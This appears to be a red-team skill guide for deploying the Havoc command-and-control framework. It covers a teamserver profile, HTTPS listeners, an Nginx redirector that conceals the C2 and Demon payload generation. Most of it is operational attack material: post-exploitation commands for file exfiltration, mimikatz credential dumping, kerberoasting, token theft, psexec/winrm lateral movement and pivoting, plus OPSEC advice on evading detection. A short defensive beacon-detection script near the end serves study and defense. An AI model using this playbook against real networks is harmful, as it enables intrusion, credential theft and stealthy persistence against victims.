Havoc is a modern open-source post-exploitation command and control (C2) framework created by C5pider. It offers a collaborative multi-operator interface similar to Cobalt Strike, with the Demon agent for Windows post-exploitation, custom profiles for malleable traffic configuration, and support for HTTP/HTTPS/SMB listeners. This skill covers deploying production-grade Havoc C2 infrastructure for authorized red team engagements, with attention to the relevant operational security (OPSEC) considerations.
Deploys and configures Havoc C2 framework with teamserver, HTTPS listeners, Nginx redirectors, and Demon agents for authorized red team operations.
```text
┌──────────────────────────────────────────────────────────────┐
│                    HAVOC C2 ARCHITECTURE                     │
├──────────────────────────────────────────────────────────────┤
│                                                              │
│  ┌──────────┐     ┌──────────────┐     ┌──────────────────┐  │
│  │  Havoc   │────▶│    HTTPS     │────▶│  Target network  │  │
│  │  client  │     │  redirector  │     │  (Demon agents)  │  │
│  │  (Kali)  │     │ (Nginx/CDN)  │     │                  │  │
│  └──────────┘     └──────────────┘     └──────────────────┘  │
│        │                 │                                   │
│        │          ┌──────────────┐                           │
│        └─────────▶│    Havoc     │                           │
│                   │  teamserver  │                           │
│                   │ (Ubuntu VPS) │                           │
│                   │  port 40056  │                           │
│                   └──────────────┘                           │
│                                                              │
└──────────────────────────────────────────────────────────────┘
```
```bash
# Clone the Havoc repository
git clone https://github.com/HavocFramework/Havoc.git
cd Havoc

# Install dependencies (Ubuntu 22.04)
sudo apt update
sudo apt install -y git build-essential apt-utils cmake libfontconfig1 \
  libglu1-mesa-dev libgtest-dev libspdlog-dev libboost-all-dev \
  libncurses5-dev libgdbm-dev libssl-dev libreadline-dev libffi-dev \
  libsqlite3-dev libbz2-dev mesa-common-dev qtbase5-dev qtchooser \
  qt5-qmake qtbase5-dev-tools libqt5websockets5 libqt5websockets5-dev \
  qtdeclarative5-dev golang-go qtbase5-dev libqt5websockets5-dev \
  python3-dev libboost-all-dev mingw-w64 nasm

# Build the teamserver
cd teamserver
go mod download golang.org/x/sys
go mod download github.com/ugorji/go
cd ..
make ts-build

# Build the client
make client-build
```
Create the Havoc profile (havoc.yaotl):
```
Teamserver {
    Host = "0.0.0.0"
    Port = 40056

    Build {
        Compiler64 = "/usr/bin/x86_64-w64-mingw32-gcc"
        Compiler86 = "/usr/bin/i686-w64-mingw32-gcc"
        Nasm       = "/usr/bin/nasm"
    }
}

Operators {
    user "operator1" {
        Password = "Str0ngP@ssw0rd!"
    }
    user "operator2" {
        Password = "An0th3rP@ss!"
    }
}

Listeners {
    Http {
        Name         = "HTTPS Listener"
        Hosts        = ["c2.yourdomain.com"]
        HostBind     = "0.0.0.0"
        HostRotation = "round-robin"
        PortBind     = 443
        PortConn     = 443
        Secure       = true
        UserAgent    = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
        Uris = [
            "/api/v2/auth",
            "/api/v2/status",
            "/content/images/gallery",
        ]
        Headers = [
            "X-Requested-With: XMLHttpRequest",
            "Content-Type: application/json",
        ]
        Response {
            Headers = [
                "Content-Type: application/json",
                "Server: nginx/1.24.0",
                "X-Frame-Options: DENY",
            ]
        }
    }
}

Demon {
    Sleep  = 10
    Jitter = 30
    TrustXForwardedFor = false

    Injection {
        Spawn64 = "C:\\Windows\\System32\\notepad.exe"
        Spawn32 = "C:\\Windows\\SysWOW64\\notepad.exe"
    }
}
```
```bash
# Start the Havoc teamserver with the profile
./havoc server --profile ./profiles/havoc.yaotl -v

# Expected output:
# [*] Havoc Framework [Version: 0.7]
# [*] Teamserver started on: 0.0.0.0:40056
# [*] HTTPS Listener started on: 0.0.0.0:443
```
Set up an Nginx reverse proxy on a separate VPS to act as the redirector:
```nginx
# /etc/nginx/sites-available/c2-redirector
server {
    listen 443 ssl;
    server_name c2.yourdomain.com;

    ssl_certificate     /etc/letsencrypt/live/c2.yourdomain.com/fullchain.pem;
    ssl_certificate_key /etc/letsencrypt/live/c2.yourdomain.com/privkey.pem;

    # Forward only traffic that matches the C2 URIs
    location /api/v2/auth {
        proxy_pass https://TEAMSERVER_IP:443;
        proxy_ssl_verify off;
        proxy_set_header Host $host;
        proxy_set_header X-Forwarded-For $remote_addr;
    }

    location /api/v2/status {
        proxy_pass https://TEAMSERVER_IP:443;
        proxy_ssl_verify off;
        proxy_set_header Host $host;
    }

    location /content/images/gallery {
        proxy_pass https://TEAMSERVER_IP:443;
        proxy_ssl_verify off;
        proxy_set_header Host $host;
    }

    # Redirect all other traffic to a legitimate site
    location / {
        return 301 https://www.microsoft.com;
    }
}
```
```text
# Via the Havoc client GUI:
# Attack > Payload
#   Agent:           Demon
#   Listener:        HTTPS Listener
#   Arch:            x64
#   Format:          Windows Exe / Windows Shellcode
#   Sleep Technique: WaitForSingleObjectEx (Ekko)
#   Spawn:           C:\Windows\System32\notepad.exe

# The generated Demon payload calls back along this path:
#   Target -> Redirector (Nginx) -> Teamserver
```
Once a Demon session has checked in, commonly used post-exploitation commands:
```
# Session interaction
demon> whoami
demon> shell systeminfo
demon> shell ipconfig /all

# Process listing
demon> proc list

# File operations
demon> download C:\Users\target\Documents\sensitive.docx
demon> upload /tools/Rubeus.exe C:\Windows\Temp\r.exe

# In-memory .NET execution (nothing written to disk)
demon> dotnet inline-execute /tools/Seatbelt.exe -group=all
demon> dotnet inline-execute /tools/SharpHound.exe -c All

# Token manipulation
demon> token steal <PID>
demon> token make DOMAIN\user password

# Credential access
demon> mimikatz sekurlsa::logonpasswords
demon> dotnet inline-execute /tools/Rubeus.exe kerberoast

# Lateral movement
demon> jump psexec TARGET_HOST HTTPS_LISTENER
demon> jump winrm TARGET_HOST HTTPS_LISTENER

# Pivoting
demon> socks start 1080
demon> rportfwd start 8080 TARGET_INTERNAL 80
```
OPSEC considerations for the infrastructure:

| Aspect | Recommendation |
|---|---|
| Domain age | Register domains more than 30 days before the engagement |
| SSL certificate | Use Let's Encrypt or a purchased certificate; never a self-signed one |
| Categorization | Submit the domain to Bluecoat/Fortiguard for categorization |
| Sleep/jitter | At least 10 s sleep with 30% or more jitter for long-running operations |
| User-Agent | Match the User-Agent of the browser commonly used in the target organization |
| Expiry date | Set the payload expiry to the engagement end date |
| Infrastructure | Keep teamserver, redirector and phishing infrastructure separate |
| Payload format | Use shellcode with a custom loader rather than a raw EXE |
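Seen from the defender's side, the profile above (Sleep 10, Jitter 30, three fixed URIs, one fixed User-Agent) leaves a cadence fingerprint in whatever web or proxy logs sit in front of the redirector. The following Python is an added example, not part of the original skill, that scores per-client request timing over a few constructed Nginx combined-format log lines; the sample lines, the 0.35 coefficient-of-variation threshold and the five-request minimum are assumptions.

```python
import re
import statistics
from collections import defaultdict
from datetime import datetime

# Constructed Nginx "combined"-format access log lines (sample data, not real traffic).
# 10.0.0.5 polls the profile's three URIs every 8-10 s; 10.0.0.9 browses normally.
UA = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
SAMPLE_LOG = "\n".join([
    f'10.0.0.5 - - [12/Mar/2024:10:00:00 +0000] "GET /api/v2/auth HTTP/1.1" 200 312 "-" "{UA}"',
    f'10.0.0.5 - - [12/Mar/2024:10:00:09 +0000] "GET /api/v2/status HTTP/1.1" 200 312 "-" "{UA}"',
    f'10.0.0.5 - - [12/Mar/2024:10:00:17 +0000] "GET /api/v2/auth HTTP/1.1" 200 312 "-" "{UA}"',
    f'10.0.0.5 - - [12/Mar/2024:10:00:27 +0000] "GET /content/images/gallery HTTP/1.1" 200 312 "-" "{UA}"',
    f'10.0.0.5 - - [12/Mar/2024:10:00:35 +0000] "GET /api/v2/status HTTP/1.1" 200 312 "-" "{UA}"',
    f'10.0.0.5 - - [12/Mar/2024:10:00:44 +0000] "GET /api/v2/auth HTTP/1.1" 200 312 "-" "{UA}"',
    '10.0.0.9 - - [12/Mar/2024:10:00:02 +0000] "GET / HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:00:03 +0000] "GET /style.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [12/Mar/2024:10:01:40 +0000] "GET /news HTTP/1.1" 200 7000 "-" "Mozilla/5.0"',
])

LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "[^"]*" "([^"]*)"')


def parse_log(text):
    """Yield (client_ip, timestamp, uri, user_agent); lines that do not match are skipped."""
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if m:
            ip, ts, _method, uri, _status, ua = m.groups()
            yield ip, datetime.strptime(ts, "%d/%b/%Y:%H:%M:%S %z"), uri, ua


def beacon_scores(text, min_requests=5, max_cv=0.35):
    """Per (client, user-agent): request count, mean gap, coefficient of variation, URIs.
    A sleep/jitter loop yields gaps clustered in [sleep*(1-jitter), sleep], so the
    stdev/mean of the gaps is low; human browsing is bursty and scores high."""
    by_src = defaultdict(list)
    for ip, ts, uri, ua in parse_log(text):
        by_src[(ip, ua)].append((ts, uri))
    scores = {}
    for key, reqs in by_src.items():
        reqs.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(reqs, reqs[1:])]
        mean = statistics.fmean(gaps) if gaps else 0.0
        cv = statistics.pstdev(gaps) / mean if len(gaps) > 1 and mean > 0 else float("inf")
        scores[key] = {"n": len(reqs), "mean": round(mean, 2), "cv": round(cv, 3),
                       "uris": sorted({u for _, u in reqs}),
                       "beaconing": len(reqs) >= min_requests and cv <= max_cv}
    return scores
```

Calling `beacon_scores(SAMPLE_LOG)` flags 10.0.0.5 (six requests, mean gap 8.8 s, coefficient of variation under 0.1, exactly the profile's three URIs) and leaves 10.0.0.9 unflagged; on real logs, raise the request minimum and extend the window to cover longer sleeps.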
MITRE ATT&CK techniques exercised by this deployment:

| Technique ID | Name | Tactic |
|---|---|---|
| T1583.001 | Acquire Infrastructure: Domains | Resource Development |
| T1583.003 | Acquire Infrastructure: Virtual Private Server | Resource Development |
| T1587.001 | Develop Capabilities: Malware | Resource Development |
| T1071.001 | Application Layer Protocol: Web Protocols | Command and Control |
| T1573.002 | Encrypted Channel: Asymmetric Cryptography | Command and Control |
| T1090.002 | Proxy: External Proxy | Command and Control |
| T1105 | Ingress Tool Transfer | Command and Control |
| T1055 | Process Injection | Defense Evasion |